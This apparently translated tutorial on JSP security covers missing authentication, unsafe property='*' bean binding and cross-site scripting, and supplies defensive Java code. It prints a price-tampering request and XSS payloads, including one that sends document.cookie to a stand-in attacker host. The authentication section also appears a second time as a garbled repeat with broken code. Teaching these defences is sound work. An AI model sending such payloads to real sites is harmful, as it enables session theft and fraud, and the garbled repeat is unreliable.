JavaServer Pages (JSP) is steadily gaining popularity as a technique for building dynamic web pages. JSP works differently from ASP and PHP: generally speaking, a JSP page is compiled rather than interpreted at execution time. The first request for a JSP file actually triggers its compilation into a servlet. When a browser later requests the same JSP file, the server checks whether the file has changed since it was last compiled; if it has not, the existing servlet is executed directly without recompilation, which improves efficiency considerably.
Today I will look at the security of JSP from the perspective of script programming; topics such as source-code exposure are outside the scope of this article. My main purpose in writing it is to remind friends who are just beginning JSP programming that a sense of secure programming must be cultivated from the start, so that avoidable mistakes, and the losses they cause, are not made. I am also a beginner myself, so please correct me if there are mistakes, and other comments are welcome.
First, lax authentication: a low-level mistake
In Ocean Forum v1.12, user_manager.jsp is the user-management page. The author knew how sensitive it is and put a lock on it:
if ((session.getValue("UserName") == null)   // attribute name garbled in the original; "UserName" is a placeholder
    || (session.getValue("UserClass") == null)
    || (!session.getValue("UserClass").equals("System Administrator"))) {
    response.sendRedirect("err.jsp?id=14");
    return;
}
If an administrator wants to view or modify a user's information, he must go through the file modifyuser_manager.jsp. The administrator submits a request:
That is, he views or modifies the information of the user whose ID is 51 (the administrator's default user ID is 51). However, such an important file has no authentication of its own: an ordinary user (including a guest) can submit the very same request directly, and the user's details are listed without restriction (the password is stored in plain text and is displayed as well). modifyuser_manager.jsp is likewise wide open, and a malicious user only runs into an error display at the point where the data update is performed. Obviously, locking one door is not enough. When programming, you must not find it tedious to add identity authentication to every page that needs it.
First, the certification is not strict - low-level mistakes
In the Ocean Forum v1.12 revision, user_manager.jsp is the user-managed page, the author knows its sensitivity, plus a lock:
IF (("" ") == NULL) ││ (" UserClass ") == NULL) ││ (! Session.getValue (" UserClass "). Equals (" System Administrator " ))) {response.sendredirect ("err.jsp? id = 14"); return;}
If you want to view, modify the information of a user, you must use the modifyuser_manager.jsp this file. Administrator submit
That is to view, the information of the user who modifies the ID 51 (the administrator's default user ID is 51). However, such an important file lacks authentication, ordinary users (including tourists) also directly submit the above request, and there is no such thing as a list (password is also a plain text storage, displayed). Modifyuser_manage.jsp also is the portal open until the malicious user performs the operation of the data update, and he will see the wrong display of the wrong display when the data update is performed. Obviously, it is not enough to lock a door. When programming, you must not be annoying to add an identity authentication for each of the added identity.
Second, guard the entrance to JavaBeans
The core of JSP component technology is a Java component called a bean. In a program, logic control and database operations are placed in JavaBean components, which are then called from the JSP file; this makes the program clearer and more reusable. A JSP page is very concise compared with a traditional ASP or PHP page, because much of the dynamic page processing can be encapsulated in JavaBeans.
To set JavaBean properties, use the <jsp:setProperty> tag. The following code is part of the source of an electronic shopping system; it displays the contents of the user's shopping basket, and checkout.jsp is used to check out.
<jsp:useBean id="basket" class="shop.BasketBean" scope="session" /> <%-- the bean id and class are placeholders; the original's were lost in extraction --%>
<jsp:setProperty name="basket" property="*" />
You have added the item <jsp:getProperty name="basket" property="newItem" /> to your basket.
Your total is $<jsp:getProperty name="basket" property="balance" />
<a href="checkout.jsp">Proceed to Checkout</a>
Notice property="*"? It means that every value the user enters on the visible JSP page, or submits directly through the query string, is stored in the bean property with the matching name.
Normally the user submits a request such as http://www.somesite.com/addtobasket.jsp?newItem=Item0105342. But what about a user who is up to no good? He may submit http://www.somesite.com/addtobasket.jsp?newItem=Item0105342&balance=0, and this value is stored in the JavaBean. When he clicks "Checkout", the goods are free.
This is the same kind of security problem that global variables cause in PHP. The lesson: property="*" must be used with caution!
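The following is an added example, not the shopping system's own code. It shows a basket bean written the way the vulnerable page needs it, beside a hardened version in which the balance is derived from the items and has no setter, so that no request parameter can reach it regardless of how the page calls <jsp:setProperty>. The class names, the property names newItem and balance, and the price table standing in for a database lookup are all assumptions.

```java
// Added example (not the shopping system's code): why property="*" is dangerous.
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/** Constructed price table standing in for the shop's database. */
class Prices {
    private static final Map<String, Double> TABLE = new HashMap<String, Double>();
    static {
        TABLE.put("Item0105342", 19.95);   // constructed sample prices
        TABLE.put("Item0105343", 5.00);
    }
    static boolean exists(String item) { return TABLE.containsKey(item); }
    static double lookup(String item) {
        Double p = TABLE.get(item);
        return p == null ? 0.0 : p.doubleValue();
    }
}

/* VULNERABLE: balance is a writable property. With
   <jsp:setProperty name="basket" property="*"/> the request
   ?newItem=Item0105342&balance=0 calls setBalance(0) after setNewItem(). */
class LeakyBasketBean {
    private String newItem;
    private double balance;
    public void setNewItem(String item) { newItem = item; balance += Prices.lookup(item); }
    public String getNewItem() { return newItem; }
    public double getBalance() { return balance; }
    public void setBalance(double b) { balance = b; }   // the hole: reachable from the query string
}

/* HARDENED: the total is recomputed from the items on the server side and
   there is no setBalance(), so &balance=0 has nothing to call. The page
   should also name the single property it accepts:
   <jsp:setProperty name="basket" property="newItem"/> */
public class BasketBean {
    private final List<String> items = new ArrayList<String>();
    private String newItem;

    public void setNewItem(String item) {
        if (!Prices.exists(item)) {                        // reject unknown item codes
            throw new IllegalArgumentException("unknown item: " + item);
        }
        newItem = item;
        items.add(item);
    }
    public String getNewItem() { return newItem; }

    /** Read-only: derived from server-side prices on every call. */
    public double getBalance() {
        double total = 0.0;
        for (String item : items) {
            total += Prices.lookup(item);
        }
        return total;
    }

    /** Simulates the setter calls <jsp:setProperty property="*"/> would make for each bean. */
    public static void main(String[] args) {
        LeakyBasketBean leaky = new LeakyBasketBean();
        leaky.setNewItem("Item0105342");    // from newItem=Item0105342
        leaky.setBalance(0);                // from balance=0
        System.out.println("leaky bean total: " + leaky.getBalance());

        BasketBean safe = new BasketBean();
        safe.setNewItem("Item0105342");     // from newItem=Item0105342
        // balance=0 is ignored: the bean has no setBalance() for setProperty to find
        System.out.println("hardened bean total: " + safe.getBalance());
    }
}
```

The point of the hardened version is that it does not rely on the page author remembering to avoid property="*": a property that must never be set by the client simply has no setter, and the value the customer pays is computed from data the client cannot touch.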
Third, cross-site scripting: an enduring problem
A cross-site scripting attack refers to inserting malicious JavaScript, VBScript, ActiveX, HTML, Flash or other script into the HTML of a remote web page, in order to steal the privacy of the users of that page, change their settings, or destroy their data. In most cases a cross-site scripting attack does not affect the operation of the server or the web program, but it is a serious threat to the security of the client.
The simplest example is taken from an imitation forum (acjspbbs). When we submit http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>alert(document.cookie)</script> the dialog box that appears contains our own cookie information. Submitting http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://www.163.com'</script> redirects to NetEase.
Because the script performs no encoding or filtering of malicious code when it echoes the "name" variable, script code is executed in the user's browser whenever the user follows a link carrying malicious "name" data, with consequences such as the leaking of the user's private information. For example, the following link: http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script>
xxx.xxx is the page that collects the parameters that follow it; here the parameter is document.cookie, the cookie of the user who visits this link. In the ASP world many people have practised the technique of stealing cookies; in JSP, reading a cookie is no harder. Of course, cross-site scripting is by no means limited to stealing cookies; I believe everyone has some understanding of this, so I will not expand on it here.
Both the inputs and the outputs of all dynamic pages should be encoded, which largely prevents cross-site scripting attacks. Unfortunately, encoding all untrusted data is a resource-intensive job that affects the performance of the web server. A commonly used alternative is filtering, for example code that replaces the dangerous characters:
A more proactive approach is to use a regular expression that allows only the specified characters:
public boolean isValidInput(String str) {
    // matches() tests the whole string; the quantifier was lost in the original, so "+" (one or more) is assumed
    if (str.matches("[A-Za-z0-9]+")) return true;
    else return false;
}
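The following is an added example, not the forum's own code, showing the two defences described above, output encoding and whitelist validation, applied to the "name" parameter of a page like dispuser.jsp. The class and method names are hypothetical, and the sample inputs are constructed.

```java
// Added example (not the forum's code): encode on output, validate on input.
public class XssDefence {

    /** Output encoding: replace the characters that have meaning in HTML with entities. */
    public static String htmlEncode(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;   // single quote: safe inside attributes too
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Whitelist validation: a user name is 1 to 32 letters, digits or underscores (assumed policy). */
    public static boolean isValidUserName(String s) {
        return s != null && s.matches("[A-Za-z0-9_]{1,32}");
    }

    /** What a hardened dispuser.jsp would do with request.getParameter("name"). */
    public static String renderUser(String name) {
        if (!isValidUserName(name)) {
            return "Invalid user name.";           // reject; never echo the rejected input
        }
        return "User: " + htmlEncode(name);       // encode anyway: defence in depth
    }

    public static void main(String[] args) {
        String benign = "someuser";                                 // constructed input
        String hostile = "someuser<script>alert(1)</script>";       // constructed input
        System.out.println(renderUser(benign));
        System.out.println(renderUser(hostile));
        // Encoding alone, for a field that must accept arbitrary text:
        System.out.println(htmlEncode(hostile));
    }
}
```

Validation and encoding answer different questions: the whitelist decides whether a value is acceptable at all, while the encoder makes sure that whatever is echoed is rendered as text and not as markup. A field such as a user name can use both; a field that must accept free text (a forum post) cannot be whitelisted this tightly and so depends on encoding every time it is written into a page.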